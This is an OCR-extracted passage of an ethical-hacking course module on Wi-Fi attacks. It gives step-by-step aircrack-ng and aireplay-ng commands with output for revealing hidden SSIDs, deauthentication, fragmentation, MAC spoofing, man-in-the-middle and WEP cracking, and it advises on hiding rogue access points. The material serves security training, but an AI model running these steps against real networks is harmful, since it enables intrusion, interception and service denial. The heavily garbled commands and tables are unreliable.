Used to enable monitor mode on wireless interfaces from managed mode and vice versa Injects frames into a WPA TKIP network with QoS, and can recover MIC key and keystram from Wi-Fi traffic Allows you to communicate via a WEP-encrypted access point (AP) without knowing the WEP key Used to create encrypted packets that can subsequently be used for injection Creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network Incorporates a number of techniques to seamlessly obtain a W EP key in minutes
TABLE 15.10: List of programs in the Aircrack-ng suite
Airtun-ng
Easside-ng
Packetforge-ng
Tkiptun-ng
Wesside-ng
Module 15 Page 2284
How to R e v e a l Hidden SSIDs

0^
. . .
Command Prompt
*
Q] 9
Step 1: Run airmon-ng in monitor mode
c:\>a!rmon-ng s ta r t e t n i
C:\>airodum p-ng - iv s - w r i t e c a p tu r e e t h l BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:60:95:6C:FC 00:22:3F:AE:68:6E PW R 99 99 99 76 RXQ 5 9 0 70 Beacons 60 75 15 157 #Data, #/s 3 2 0 1 0 0 0 0 CH 1 5 9 11 MB 54e 54e 54e 54e ENC OPN OPN W EP W EP W EP W EP CIPHER AUTH ESSID IAM ROGER COMPANYZONE H OM E
Step 2: Start airodump to discover SSIDs on interface
clength: 10>
....................... y BSSID 00:22:3F:AE:68:6E 00:22:3F:AE:68:6E Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD PW R -1 76 Rate 1- 0 le-54 Lost 0 0 Packets 1 6 Probes
* Hidden SSID
Command Prompt
C:\>aireplay-ng - d e a u th 11 -a 00:22:3F:AE:68:6E
Step 3: Oeauthenticate (deauth) the client to reveal hidden SSID using Aireplay-ng
Command Prompt
Step 4: Switch to BSSID 00:22:3F:AE:68:6E P W R RXQ Beacons #Data, #/s CH M B ENC CIPHER AUTH ESSID 76 70 157 1 0 11 54e W E P W EP Secret SSID airodump to see the revealed SSID
C o pyrigh t b y EC-CMMCil. All Rights Reserved.;R ep rod u ctio n is Strictly Probfbited.
fe C
How to Reveal Hidden SSIDs
Hidden SSIDs can be revealed by using the Aircrack-ng suite. The process involves the following steps: Step 1: Run airmon-ng in monitor mode Step 2: Start airodump to discover SSIDs on interface
Com m and Pro m p t
c:\>airm0 n-ng start e th l C:\>airodump-ng ivs --write capture e t h l BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 00:22:3F:AE:68:6E BSSID PWR 99 99 99 76 RXQ 5 9 0 70 Beacons 60 75 15 157 PWR -1 76 #Data, #/s 0 3 2 0 1 Rate 1-0 le-54 0 0 0 CH 1 5 9 11 Lost 0 0 MB 54e 54e ENC OPN WEP WEP WEP Probes CIPHER AUTH ESSID IAMROGER COMPANYZONE HOME <length: 10>: ....................... * Station Packets 1 6 00:22:3F:AE:68:6E 00:17:9A:C3:CF:C2 00:22:3F:AE:68:6E 00:1F:5B:BA:A7:CD 54e OPN
54e WEP
Hidden SSID
F IG U R E 15.44: Discovering Hidden SSIDs
Module 15 Page 2285
Step 3: De-authenticate (deauth) the client to reveal hidden SSID using Aireplay-ng j g l Command Prompt
| c:\>aireplay-ng --deauth 11 -a 00 :2 2 :3 F:A E :6 8 :6 E
FIGURE 15.45: De-authenticating the client using Aireplay-ng
Step 4: Switch to airodump to see the revealed SSID 3S

BSSID
Command Prompt
PWR RXQ Beacons ffData, it/s CH MB ENC CIPHER AUTH ESSID 70 157 1 0 11 54eWEP WEP Secret SSID
00:22:3F:AE:68:6E 76
FIGURE 15.46: Viewing the disclosed SSID using airodump
Module 15 Page 2286
F ragm entation Attack

M This attack does not reco ver the W E P key itself, but m erely obtains the PRGA
CEH
(rtifwtf I til1(41 Nm Im
A fragm entation attack, when successful, can obtain 1500 bytes of PR G A (pseudo random generation algorithm)
The PR G A can then be used to generate packets w ith packetforgeng which are in turn used for various injection attacks It requires at least one data packet to be received from the access point in order to initiate the attack
Command Prompt
C:\> airep lay-ng -5 -b 00:1 4 :6C :7 E:4 0 :8 0 -h 0 0 :0 F :B 5 :A B :C B :9 D athO
Command Prompt
Saving chosen packet injreplay src-0124-161120.capC Data packet found? * Sending fragmented packet Got RELAYED packet?! PR G A is stored in the file Thats our ARP packet? Trying to get 384 bytes of a keystrean Got RELAYED packet?? Thats our ARP packet? Trying to get 1500 bytes of a keystream Got RELAYED packet?? Thats our ARP packet? Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Waiting for a data packet.. . Read 96 packets... Size: 120, FrooDS: 1, ToDS: 0 (WEP) BSSID - 00:14:6C:7E:40:80 Dest. MAC - 00:OF: B5: AB: CB:9D Source MAC - 00:D0:CF:03:34:8C 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0x0060: 0x0070: Use this 0842 0201 OOOf OOdO cf03 348c 6d6d bleO 92a8 a21d 2a70 49cf 7013 f7f3 5953 fd55 66a2 030f 517f 1544 bd82 0505 933f af2f packet ? y b5ab e0d2 039b eef8 1234 472d ad77 740e cb9d 4001 ca6f 19b9 5727 2682 fe9a 0014 0000 cecb 279c 146c 3957 cd99 6c7e 2b62 5364 9020 eeaa 8429 a43c 4080 .B........ l-. 7a01 ---4.. .0...bz. 6el6 1m ..... o. .Sdn. 30c4 ..*pi....0. a594 P...YS.4W.1___ 9ca5 .Uf...G-&.9W.) .. 52a1 QQD. ..w....<R.
Use PRGA with packetforge-ng to generate packet(s) to be used for various injection attacks
Copyright b y EG-G(IIIICil. All Rights Reserved. Reproduction Is Strictly Prohibited.
Fragm entation Attack

When fragmentation attack is successful, it can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng, which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack. Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). A larger amount of keying information can be gathered from the replay packet, if the packet is successfully echoed back by the AP. This cycle is repeated several times. Use PRGA with packetforge-ng to generate packet(s) to be used for various injection attacks.
Module 15 Page 2287
C o m m an d P ro m p t C:\>aireplay-ng -5 -b 00:14:6C:7E:40:80-h 00:0F:B5:AB:CB:9Dath0

Waiting for a data packet... Read 96 packets... Size: 120, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = 00:O F :B 5 : A B :CB:9D Source MAC = 00:DO:C F :03:34:8C 0842 0201 OOOf OOdO cf 03 348c 6d6d bleO 92a8 a21d 2a70 49cf 7013 f 7f 3 5953 fd55 66a2 030f 517f 1544 bd82 0505 933f a2 Use this packet ? y 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 b5ab e0d2 039b eef 8 1234 472d ad77 740e cb9d 4001 ca6f f 9b9 5727 2682 fe9a 0014 0000 cecb 279c 146c 3957 cd99 6c7e 2b62 5364 9020 eeaa 8429 a43c 4080 7a01 6el6 30c4 a594 9ca5 52al .B___ ..... 1-0. ___ 4. ..e ...+ b z . nun. ... ...o ..Sdn. ..*pi.___ ' 0 . p . ..YS .4 W ' .1 ___ .Uf.. .G - & .9W.).. Q f l .D. .. w .... < R . ...?./t.
FIGURE 15.47: Fragmentation attack screenshot
g g C o m m an d P ro m p t m Saving chosen packet in;replay_src-0124-161120.cap. Data packet found! Sending fragmented packet -----------------------Got RELAYED packet!! PRGA is stored in the file Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
FIGURE 15.48: Screenshot showing PRGA location
Module 15 Page 2288
How to Launch MAC Spoofing Attack

J configured in an access point
CEH
M A C spoofing attackers change the M A C address to that of an au thenticated user to bypass the M A C filtering
Linux Shell
[root@localhost root]# ifconfig wlanO d ow n ..................................
[root@localhost root]# ifconfig wlanO h w e th e r 02:25:ab:4c:2a:bc [rootgaiocalhost root]# ifconfig wlanO up
Show OnlyAdive Netwoik Adaplets New Spooled MAC Address
Update MAC
I 00 -| 05 -| 56 1 360 SYSTEMS (000556! Spooled MAC Address |Not Spooled Active MAC Address |A4-BA-0B-FD-86-63
| - 88 | - 55 | j< J
Restart Adapter Random Refresh
IPConfig MAC List Exit
SMAC is a MAC address changer for Windows systems Randomly generate any New MAC Address or based on a selected manufacturer
3
J Netwcxk Connection jLocal Area Connection
-*
pci\ven_14e4dev_1692$ub$ys_04261028
Copyright b y
EG-Gtlincil. All
How to Launch a M A C Spoofing Attack
A MAC address is a unique identifier assigned to the network card. Some networks implement MAC address filtering as a security measure. MAC spoofing attackers change the MAC address to that of an authenticated user to bypass the MAC filtering configured in an access point. To spoof a MAC address, the attacker simply need to set the value returned from ifconfig to another hex value in the format of aa:bb:cc:dd:ee:ff. To make the change the sudo command requires the root password. SMAC is a MAC address changer for Windows systems. Randomly generate any new MAC address or based on a selected manufacturer.
Linux Shell
[root@localhost root]# ifconfig wlanO dow n ..................................
[root@localhost root]# ifconfig wlanO hw eth er 02:25:ab:4c:2a:bc [root@localhost root]# ifconfig wlanO up ..................................
FIGURE 15.49: Spoofing MAC address to another new hex value
Module 15 Page 2289
Show Only Active Network Adapters
Update MAC Restart Adapter
Remove MAC IPConfig MAC List Exit
New Spoofed MAC Address
00 - | 05 - | 56 - | 55 - | 88 - | 56|
1 360 SYSTEMS [000556] Spoofed MAC Address |Not Spoofed Active MAC Address (A4-BA-DB-FD-86-63
xj
Random Refresh
3
Network Connection |Local Area Connection
Hardware ID |pci\ven_14e4dev_1692subsys_04261028
FIGURE 15.50: Screenshot showing the new spoofed MAC address
Module 15 Page 2290
D en ia l of Service: Deauthentication and Disassociation Attacks
Client is authenticated and associated w ith AP
Client connects to netw ork Client is still authenticated but no longer associated w ith the AP
Client attempting to connect
Access Point (AP)
Attacker
D is a s s o c ia t io n A tt a c k
D cauth com m and: a i r e p l a y - n g d e a u t h 2 5 - h <TARGET M AO b <AP M AO a t h l
Client is authenticated and associated w ith AP
Client is no longer authenticated or associated w ith the AP
<................ Attacker sends a Deauthenticate Request packet to take a single client offline
^
22Z1Z'. I : : : :
Access Point (AP)
Client fully connected
Attacker
D e a u t h e n t ic a t io n A tta c k s
D enial of Service: Deauthentication and # Disassociation Attacks

Wireless networks are susceptible to denial-of-service attacks. Usually these networks operate in unlicensed bands and the transmission of data takes the form of radio signals. The designers of the MAC protocol aimed at keeping it simple, but it has its own set of flaws that are more attractive to DoS attacks. The possibility of DoS attacks on wireless networks is greater due to the relationship of the physical, data-link, and network layers. The DoS attacks on wireless networks can be performed using the two techniques: disassociation attacks and deauthentication attacks. In a disassociation attack, the attacker makes the victim unavailable to other wireless devices by destroying the connectivity between station and client.
C lient is a u th e n tica te d and asso ciated w ith A P
C lient con n ects to n e tw o rk
'M
Client attempting to connect
Client is still au th en ticated but no longer associated w ith the A P
'Vs/
Access Point (AP)
D isa sso cia tio n A tta ck
FIGURE 15.51: Diagrammatical representation of Disassociation Attack
Module 15 Page 2291
In a deauthentication attack, the attacker floods station(s) with forged deauthenticates or disassociates to disconnect users from an AP.
Attacker
Man-in-theMiddle Attack
Attacker sniffs the victim's wireless parameters (the MAC address, ESSID/BSSID, number of channels)
CEH
Victim is deauthenticated and starts to search all channels for a new valid AP
r %
Oeauthenticated
< ... * a
Attacker sets a forged AP on a new channel with the original MAC address (BSSID) and ESSIO of the victim's AP
After the victim's successful association to the forged AP, the attacker spoofs victim to connect to the original AP
Attacker sits in between the access point and the victim and listens all the traffic
r-
Victim Connects Connects*. to Forged AP *
*8 .3
Copyright b y
EG-G*ancil. All
A man-in-the-middle attack is an active Internet attack where the attacker attempts to intercept, read, or alter information between two computers. MITM attacks are associated with a 802.11 WLAN, as well as with wired communication systems. E a v e s d r o p p in g Eavesdropping is easy in a wireless network because there is no physical medium used to communicate. An attacker who is in an area near the wireless network can receive radio waves on the wireless network without much effort or many gadgets. The entire data frame sent across the network can be examined in real time or stored for later assessment. In order to prevent whackers from getting sensitive information, several layers of encryption should be implemented. WEP, data-link encryption, was developed for this purpose. If a security mechanism such as IPSec, SSH, or SSL is not used for transmission, the sent data is available to anyone, and is vulnerable to attack by whackers with an antenna. However, W EP can ked with tools freely available on the net. Accessing email using the POP or IMAP protocols is risky because these protocols can send email over a wireless network without any form of extra encryption. A determined whacker can potentially log gigabytes of WEP-protected traffic in an effort to post-process the data and break the protection.
Module 15 Page 2293
M a n ip u la t io n ^ Manipulation is the next level up from eavesdropping. Manipulation occurs on a 1 1 wireless link when an attacker is able to receive the victim's encrypted data, manipulate it, and retransmit the changed data to the victim. In addition, an attacker can intercept packets with encrypted data and change the destination address in order to forward these packets across the Internet. The figure that follows shows a step-by-step explanation of a man-in-the-middle attack:
Attacker sniffs the victim's wireless parameters (the MAC address, ESSID/BSSID, number of channels)
Sends a DEAUTH request to the victim with the spoofed source address of the victim's AP
Victim is deauthenticated and starts to search all channels for a new valid AP
* 9 :
D e au th en ticated
*3
Attacker sets a forged AP on a new channel with the original MAC address (BSSID) and I I I
<............ % 3
<....
,3
After the victim's successful association to the forged AP, the attacker spoofs victim to connect to the original AP
Attacker sits in between the access point and the victim and listens all the traffic
0
:
(6 )
;3
FIGURE 15.53: Steps explaining man-in-the-middle attack
Module 15 Page 2294
MITM Attack Using Aircrack-ng

Command Prompt
C:\>airmonng start ethl
BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E PW R 99 99 99 99 76 Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD 76 le-S4 0 R XQ 5 5 9 0 70 PW R R ate
C EH
Urt1fw4 ilhiul lUthM
^
Beacons 60
CH 1 5 9 1 Lost MB 54e 54e 54e 0 11 ENC OPN OPN W EP 54e W EP W EP W EP 0 0 0
Step 1: Run airmon-ng in

CIPHER AUTH
C:\>airodumpng -ivs --write capture e th l

#Data, #/s 3
ESSID
monitor mode Step 2: Start airodump to discover SSIDs on interface
1AM ROGER CO M PANYZON E HO M E SECRET SSID
Packets 6
Probes
10 1 - 0 1
Command Prompt
C:\>aireplay-ng -deauth 5 -a 02:24:2B:CD:68:EE
Step 3: Deauthenticate (deauth) the client using Aireplay-ng
Command Prompt
C:\>aireplay-ng -10 -e SECRET_SSID -a le:64:51:3b:ff:3e -h 02:24:2B:CD:68:EE e th l
22:25:10 W a itin g for beacon fram e (BSSID : 1E:64:51:3B:FF:3E) on channel 11 22:25:10 Sending Authentication Request 22:25:10 A uthentication successful 22:25:10 Sending Association Request 22:25:10 Association su ccessfu l:-)
<
Step 4: Associate your wireless card (fake association) with the A P you are accessing with aireplay-ng
Copyright by EG-CtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited.
M IT M Attack Using Aircrack-ng

7 Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP,
and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks. It can be used to perform man-in-the-middle attacks on wireless networks. To perform the MITM attack on WLANs using Aircrack-ng the user of the tool should follow these steps: Step 1: Run airmon-ng in monitor mode Step 2: Start airodump to discover SSIDs on interface
C:\>airmon-ng start ethl C:\>airodump-ng -ivs -write capture ethl

BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E PW R 99 99 99 76 Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD R XQ 5 9 0 70 Beacons 60 75 15 157 PW R -1 76 Rate 1 -0 le-54 #Data, 3 2 0 #/s 0 0 0 1 Lost 0 0 CH 1 5 9 MB 54e 546 54e 0 11 ENC OPN OPN W EP 54e W EP W EP W EP CIPHER AUTH ESSID IA M R O G ER CO M PA N Y ZO N E HOME SECRET SSID
Packets 1 6
Probes
F IG U R E 15.54: Discovering SSIDs using
Module 15 Page 2295
Step 3: De-authenticate (deauth) the client using Aireplay-ng
FIGURE 15.55: Aireplay-ng de-authenticating the client
Step 4: Associate your wireless card (fake association) with the AP you are accessing with aireplay-ng Command Prompt
C:\>aireplay-ng -1 0 e SECRET_SSID a le:64:51:3b:ff:3e h 02:24:2B:CD:68:EE e th l
22:25:10 W aitin g for beacon fram e (BS5ID : 1 E:6 4 :51 :3 B:FF3 E) on channel 11 22:25:10Sending Authentication Request 22:25:10 A uthentication successful 22:25:10 Sending Association Request 22:25:10Association successful :-)
FIGURE 15.56: Associating wireless card
Module 15 Page 2296
W ireless ARP Poisoning Attack
CEH
Urt1fW4 ttfciul lUilwt
A P I sends updated MAC address info to the network routers and switches, which in turn update their routing and switching tables Access Pointl
Traffic now destined from the network backbone to Juggyboy's system is no longer sent to AP2
Access Point2
Attacker spoofs the MAC address of Jessica's Wireless Laptop and attempts to authenticate to A PI
Normal flow of wireless traffic
MAC Address 04 A4 52-33-61
Attacker uses A R P Poisoning tool such as Cain & Abel
MAC Address 00 45-B8-74-03
Attacker's System
Jessica's Wireless Laptop
Wireless ARP Poisoning Attack

ARP is used to determine the MAC address of an access point whose IP address is known. Usually the ARP doesn't possess any verification feature that can tell that the responses are from valid hosts or it is receiving a forged response. ARP poisoning is an attack technique that exploits the lack of verification. In this technique the ARP cache maintained by the OS with wrong MAC addresses are corrupted. This can be achieved by sending an ARP Replay pack constructed with a wrong MAC address. The ARP poison attack has its impact on all the hosts present in a subnet. All stations associated with a subnet affected to ARP poison attack are vulnerable as most of the APs act as transparent MAC layer bridges. All the hosts connected to a switch or hub are susceptible to ARP poisoning attacks if the access point is connected directly to that switch or hub without any router/firewall in between them. The following diagram illustrates the ARP poisoning attack process:
Module 15 Page 2297
A P I sends updated M A C address info to the network routers and switches, which in turn update their routing and switching tables
Traffic now destined from the netw ork backbone to Juggyboy's system is no longer sent to AP2
Access Point2
A
Attacker spoofs the M A C address of Normal flo w of wireless traffic Juggyboy's wireless laptop and attem pts to authenticate to A P I
&
/
M AC Address
M A C Address 04-A4-52-33-61
Attacker uses ARP Poisoning tool such as Cain & Abel
00-45-B8-74-03
Attacker's System FIGURE 15.57: Wireless ARP Poisoning Attack process
Juggyboys Wireless Laptop
In this wireless ARP spoofing attack, the attacker first spoofs the MAC address of Juggyboy's wireless laptop and attempts to authenticate to A PI. A P I sends the updated MAC address information to the network routers and switches, which in turn update their routing and switching tables. Traffic now destined from the network backbone to Juggyboy's system is no longer sent to AP2 instead it is sent to API.
Module 15 Page 2298
R ogue A c c e ss Point
Compact, pocketsized rogue AP device plugged into an Ethernet port of corporate network
Choose an appropriate location to plug in your rogue access point that allows maximum coverage from your connection point
Rogue access point device connected to corporate networks over a Wi-Fi link
Disable the SSID Broadcast (silent mode) and any management features to avoid detection
Place the access point behind a firewall, if possible, to avoid network
Software-based rogue access point running on a corporate Windows machine
Deploy a rogue access point for short period
USB-based rogue access point device plugged into a corporate machine
Copyright b y
EG-Gtlincil. All
Rogue access points (APs) are the wireless access points that are installed on a network without authorization and are not under the management of the network administrator. These rogue access points lack the security controls provided for the authorized APs of a network, thus providing backdoor access to the network for anyone connecting to the rogue AP. To gain backdoor access to a network through a rogue AP, the attacker should follow these steps: 9 Choose an appropriate location to plug in your rogue access point that allows maximum coverage from your connection point Disable the SSID Broadcast (silent mode) and any management features to avoid detection Place the access point behind a firewall, if possible, to avoid network scanners Deploy a rogue access point for shorter periods
Rogue Access Point
9 9
Interesting scenarios for rogue AP installation/setup: 9 Compact, pocket-sized rogue AP device plugged into an Ethernet port of corporate network: compact, pocket-sized rogue APs are easily available on the market. These of their compact size. They can be brought into a particular location without any efforts
Module 15 Page 2299
and can be hidden easily. Also, these APs require very low power; therefore, they can be powered even from a battery for long durations. 6 Rogue AP device connected to corporate networks over a Wi-Fi link: The rogue AP device can also be connected to a network over a Wi-Fi link. This is possible when the target network also has Wi-Fi coverage. As the AP device connects wirelessly to the authorized network, hiding this rogue AP device is easy. This eliminates the need of unused Ethernet port of the target network, but installing the rogue AP device wirelessly requires the credentials of the target network. The attacker should use the Wi-Fi Ethernet Bridge in conjunction with a regular AP device in order to connect to the target network. USB-based rogue AP device plugged into a corporate machine: A USB-based rogue AP device is generally plugged in to a windows machine with access to the target network either though wired or wireless means. The machine's network access can be shared with a rogue device using the USB AP's software. This eliminates the need of unused Ethernet port and the credentials of the target Wi-Fi in order to set up a rogue AP. Software-based rogue AP running on a corporate Windows machine: In this scenario, no separate physical AP device is needed as the rogue AP are set up in the software itself on the embedded/plugged Wi-Fi adapter of the target network. This is possible through the virtual Wi-Fi capability of the latest Windows operating system, Windows 7. This makes the rogue AP even stealthier.
Module 15 Page 2300
Evil Twin
Authorized Wi-Fi
Evil Twin is a wireless A P that pretends to be a legitimate AP by replicating another network name
CEH
Evil Twin
Attacker sets up a rogue A P outside the corporate perimeter and lures user to sign into the wrong AP
Once associated, users may bypass the enterprise security policies giving attackers access to network data
Evil Twin can be configured with a common residential SSID, hotspot SSID or SSID of a company's WLAN
Wi-Fi is everywhere these days and so are your employees. They take their laptops to Starbucks, to FedEx Office, and to the airport. How do you keep the company data safe?
Copyright b y
EG-Gtlincil. All
Evil Tw in
Evil Twin is a wireless AP that pretends to be a legitimate AP by imitating another network name. It poses a clear and present danger to wireless users on private and public WLANs. Attacker sets up a rogue AP outside the corporate perimeter and lures user to sign into the wrong AP. Attackers can use attacking tools such as KARMA that monitors station probes to create an evil twin. It can adopt any commonly-used SSIDs as its own SSID in order to lure the users. Or Evil Twin can be configured with a common residential SSID, hotspot SSID or SSID of a company's WLAN. As long as legitimate users can be monitored with various tools even APs that do not send SSIDs in probe requests can be targeted. WLAN stations usually connect to specific APs based on its SSIDs and the signal strength and also the stations automatically reconnect to any SSID that has been used in the past. These issues allows the attackers to trick the legitimate users easily just by placing an Evil Twin near the target network. Once associated, users may bypass the enterprise security policies giving attackers access to network data.
Module 15 Page 2301
SSID: STARBUCKS
FIGURE 15.58: Evil twin
Module 15 Page 2302
How to Set Up a Fake Hotspot (Evil Twin)
How to Set Up a Fake Hotspot (Evil Twin)

Hotspots available in the region may not always be a legitimate AP. There may be a possibility of evil twin mounted by the attacker that pretends to be a legitimate hotspot. It is difficult to differentiate between a legitimate hotspot and an evil twin as the evil twin pretends to be the legitimate one. For instance, a user tries to log in and finds two access points. One is legitimate, while the other is an identical fake (evil twin). The victim picks one; if it's the fake, the attacker gets login information and access to the computer. In the meantime, the user goes nowhere. He or she probably thinks it was just a login attempt that randomly failed. Following are the steps that illustrate the process of setting up or mounting a fake hotspot (Evil Twin): Q You will need a laptop with Internet connectivity (3G or wired connection) and a mini access point Q 9 Enable Internet Connection Sharing in Windows 7 or Internet Sharing in Mac OS X Broadcast your Wi-Fi connection and run a sniffer program to capture passwords
Module 15 Page 2303
A
Victim
Victim Broadcast SSID:Starbucks
i
Attacker Computer set as AP, Running a Sniffer
3G or Ethernet Connection to the Internet
Internet FIGURE 15.59: Setting up a fake hotspot
non
4 [ Show All
Sharing
Comj
Network Name: Channel:
Juggyboy Automatic
13
t...
Enable encryption (using WEP)
On

Sei
SCI Fih
Password: Confirm Password: W EP Key Length: 128-bit Internet Sharing: Off
D V w
SCI
Re Re
w(
If you plan to shar computers, use a S and a 13 character
Internet Sharing allows other computers to share your connection to the Internet.
Share your connection from: Ethernet
Tl
Remote Appte Events

X gr i d Shar i ng
^
0
Internet Sharing
Bl ue t oot h Shar i ng
Q o
On
Ports
Ethernet AirPort FireWire
Cl i ck t he l ock t o p r e ve nt f u r t h e r c hange s .
FIGURE 15.60: Capturing passwords
Module 15 Page 2304
tertMM
c EH
ttkM4l lUibM
GPS M apping
W ire le ss T ra ffic A n a lys is
C ra c k W i-Fi E n c ry p tio n
L au n ch W ire le ss A tta c k s
Copyright b y IG -G O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

Wireless network, then you should determine the encryption used by the WLAN and then crack the encryption.
Module 15 Page 2305
How to Crack WEP Using Aircrack

M o n ito r w ireless traffic W ith a ir m o n - n g
(rt1fw 4
CEH
tlfcxjl H M bM
C :\>airmon-ng start ethl
Collect w ireless traffic data w ith a ir o d u m p - n g
C :\>airodump-ng --ivs --write capture ethl
Associate you r w ireless card w ith the A P you are accessing w ith aireplay-ng
C :\>aireplay-ng -1 0 -e SECRET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 ethl
Start packet injection w ith aireplay-ng
C:\>aireplay-ng -3 -b le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 ethl
D ecrypt the W E P Key w ith aircrack-ng
C :\>aircrack-ng -s capture.ivs
1/ *How to Crack WEP Using A ircrack

WEP is a broken security algorithm for 802.11 wireless networks. It is intended to provide the data confidentiality in wireless networks. Attackers want to break this encryption key to break into the wireless networks. This WEP has vulnerabilities that can be exploited easily and thus, the W EP key can be cracked. The following steps explain the process of cracking WEP using the Aircrack tool. STEP 1: Monitor wireless traffic with airmon-ng C : \>airmon-ng s t a r t e th l STEP 2: Collect wireless traffic data with airodump-ng C : \>airodump-ng --ivs --w rite capture e th l STEP 3: Associate your wireless card with the AP you are accessing with aireplay-ng
C :\>aireplay-ng 0 1 a 7 :71:f e :8 e :d 8 :25 ethl -e SECRET_SSID -a l e :64:51:3 b :f f :3e -h
STEP 4: Start packet injection with aireplay-ng

C :\>aireplay-ng -3 -b l e :64:51:3 b :f f :3e -h a 7 :71:f e :8 e :d 8 :25 ethl
STEP 5: Decrypt the WEP Key with aircrack-ng

C : \>aircrack-ng -s ca p tu re . iv s
Module 15 Page 2306
H ow to C rac k W EP U sing A irc ra c k Screenshot 1/2

Command Prompt
1
.L . c:\>a1rm on-ng start: e i n i
EH
S te p 1: Run airmon ng in monitor mode
V . ..........
...........
m m
......... ENC OPN OPN W EP W EP W EP W EP CIPHER AUTH ESSID IAM ROGER "
C:\>airodum p-ng iv s --w rite c a p tu r e e t h l BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E PW R 99 99 99 76 RXQ 5 9 0 70 Beacons 60 75 15 157
<
0 0 0 0
........ . . . . CH MB 54e 54e 54e 54e
*Data, #/s 3 2 0 1
S te p 2: Start airodump to discover SSIDs on interface and keep it running. Your capture file should contain more than 50,000 IVs to successfully
1
5 9 11
COMPANYZONE HOM E SECRET_SSID
BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E
Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD
PW R -1 76
Rate 1- 0 le-54
Lost 0 0
Packets 1 6
Probes
crack the W E P key.
5*S Command Prompt

C:\>aireplay-ng -1 0 -e SEC R ET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 e t h l
22:25:10 Waiting for beacon frame (BSSltf:15:64:51:3B:FF:3E) o n W y in e l 11
_
< ................. Step 3: Associate
your wireless card with target access point
22:25:10 Sending Authentication Request 22:25:10 Authentication successful 22:25:10 Sending Association Request 22:25:10 Association successful:-)
Target M A C address
How to Crack WEP Using A ircrack Screenshot 1/2

Aircrack is a tool that can be used for cracking W EP encryption, which provides the data confidentiality for wireless networks. The following are screenshots of the W EP cracking process using the Aircrack tool. Step 1: Run airmon-ng in monitor mode. Step 2: Start airodump to discover SSIDs on interface and keep it running. Your capture file should contain more than 50,000 IVs to successfully crack the WEP key. r7 Command Prompt
1
A.
c:\>airm0 n-ng start e t h l C:\>airodump-ng --ivs --w rite capture e t h l BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E PWR 99 99 99 76 RXQ 5 9 0 70 Beacons 60 75 15 157 PWR -1 76 #Data, #/s 3 2 0 1 Rate 1-0 le-54 0 0 0 0 CH 1 5 9 11 Lost 0 0 MB 54e 54e 54e 54e ENC OPN OPN WEP WEP WEP WEP Probes CIPHER AUTH ESSID IAMROGER COMPANYZONE HOME SECRETSSID
Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD
Packets 1 6
FIGURE 15.61: Discovering SSIDs using airodump
Module 15 Page 2307
Step 3: Associate your wireless card with the target access point, a Command Prompt
C:\>aireplay-ng -1 0 -e SECRET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 e th l 22:25:10 Waiting for beacon frame (BSSIl3!iJE:64:51:3B:FF:3E)on^F!aj1neI 11 22:25:10 Sending Authentication Request 22:25:10 Authentication successful 22:25:10 Sending Association Request 22:25:10 Association successful:-) Target SSID Target MAC address
FIGURE 15.61: Screenshot showing target SSID and MAC address
Module 15 Page 2308
How to Crack WEP Using Aircrack Screenshot 2/2

ra?
jjjj Command Prompt
< C:\>aireplay-ng -3 -b l e: 64: 51: 3b :f f: 3e -h a7:71:fe:8e:d8:25 e t h l
EH
S te p 4: Inject packets using aireplay-ng to generate traffic on target access point
22:30:15 W aiting for beacon fram e (BSSID: 1E:64:51:3B:FF:3E)
Saving A RP requests in replay_arp-0219-123051.cap You should also start airodump-ng to capture replies Read 11978 packets (got 7193 A RP requests), sent 3902 packets...
P&t Command Prompt

C:\>aircrack-ng -s capture.ivs
